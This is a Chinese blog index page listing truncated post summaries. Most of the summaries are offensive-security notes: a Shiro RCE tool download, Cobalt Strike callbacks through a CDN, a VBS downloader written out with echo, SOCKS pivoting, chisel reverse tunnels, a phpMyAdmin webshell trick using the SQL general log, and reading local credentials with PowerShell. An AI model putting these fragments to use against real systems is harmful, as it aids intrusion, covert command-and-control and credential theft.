websec80

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理
上一页 1 ··· 6 7 8 9 10 11 下一页

2021年6月9日

实战 OpenVPN AS 服务器
摘要: 众所周知,OpenVPN(http://www.openvpn.net)是比较著名的开源 VPN 软件,应该也有很多人使用过,虽然使用起来并不是很困难,配置过程也比较麻烦,需要调试和更改一些参数,好在 OpenVPN Technologies, Inc 推出了商业版的 OpenVPN Access 阅读全文
posted @ 2021-06-09 14:07 websec80 阅读(8) 评论(0) 推荐(0)

2021年6月3日

mysql8.0以后的版本开启远程连接:
摘要: mysql8.0以后的版本开启远程连接: 1 CREATE USER 'root'@'%' IDENTIFIED BY '你的密码'; 2 GRANT ALL ON *.* TO 'root'@'%'; 3 ALTER USER 'root'@'%' IDENTIFIED WITH mysql_na 阅读全文
posted @ 2021-06-03 10:55 websec80 阅读(283) 评论(0) 推荐(0)

2021年4月15日

shiro_rce 利用
摘要: 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31:新增自定义或随机useragentrandomagent --> random useragentuseragent= --> set useragentc 阅读全文
posted @ 2021-04-15 08:54 websec80 阅读(935) 评论(0) 推荐(0)

2021年4月13日

CS如何配置通过CDN上线
摘要: 0X00 所需 域名*1 CDN*1 VPS*1 0X01 部署 域名购买后将DNS更改为CDN服务商的DNS服务器,然后等待生效 以CF为例,生效后会给邮箱发一封邮件 ​ 然后配置解析域名 前言 在拿下了目标机之后,目标机在内网里面,使用用msf或者CS时,用VPS做服务器的话,会导致自己的VPS 阅读全文
posted @ 2021-04-13 09:26 websec80 阅读(1809) 评论(0) 推荐(0)

2021年4月12日

vbs下载脚本
摘要: echo on error resume next >c:\Users\Public\Videos\zl.vbsecho iLocal=LCase(Wscript.Arguments(1)) >>c:\Users\Public\Videos\zl.vbsecho iRemote=LCase(Wscr 阅读全文
posted @ 2021-04-12 15:00 websec80 阅读(285) 评论(0) 推荐(0)

cs 上线主机内网代理模块
摘要: CS4.2 已知上线主机 通过扫描内网IP段探测更多内网主机(获取一些内网主机的信息包括权限口令之类) 选择可以上线的服务器 pivoting-->sockes(服务) 监听(端口为cs服务器空闲端口)--> 要查看当前设置的SOCKS服务器,请转到查看->代理枢轴。 在信标控制台中使用socks 阅读全文
posted @ 2021-04-12 11:24 websec80 阅读(719) 评论(0) 推荐(0)

2021年3月9日

内网穿透工具chisel
摘要: 内网穿透工具 下载地址 https://github.com/jpillora/chisel/releases/tag/v1.7.4 使用示例 1. chisel进行ssh内网穿透 //vps上 ./chisel server -p 6666 --reverse //靶机上 ./chisel cli 阅读全文
posted @ 2021-03-09 14:56 websec80 阅读(1726) 评论(0) 推荐(0)

2021年3月4日

Ubuntu——解决"GPG 由于没有公钥,无法验证"的问题
摘要: W: GPG 错误:http://www.remastersys.com oneiric Release: 由于没有公钥,无法验证下列签名: NO_PUBKEY B6068D255563B350 取后八位sudo apt-key adv --recv-keys --keyserver keyserv 阅读全文
posted @ 2021-03-04 18:30 websec80 阅读(1011) 评论(0) 推荐(0)

2018年4月10日

phpmyadmin getshell新思路
摘要: 开启SQL日志功能 SET global general_log="ON"; 设置日志文件地址,这个地址需要设置网站目录里的地址,因为要获取权限得通过容器解释代码才行,而网站目录地址则可以通过刚才的探针获得 SET global general_log_file='D:/phpStudy/WWW/s 阅读全文
posted @ 2018-04-10 11:02 websec80 阅读(109) 评论(0) 推荐(0)

2017年11月3日

powershell读取本地凭据
摘要: PS E:> Get-ExecutionPolicyRestricted get-executionpolicy 若要在本地计算机上运行您编写的未签名脚本和来自其他用户的签名脚本,请使用以下命令将计算机上的 执行策略更改为 RemoteSigned: set-executionpolicy remo 阅读全文
posted @ 2017-11-03 14:37 websec80 阅读(730) 评论(0) 推荐(0)

上一页 1 ··· 6 7 8 9 10 11 下一页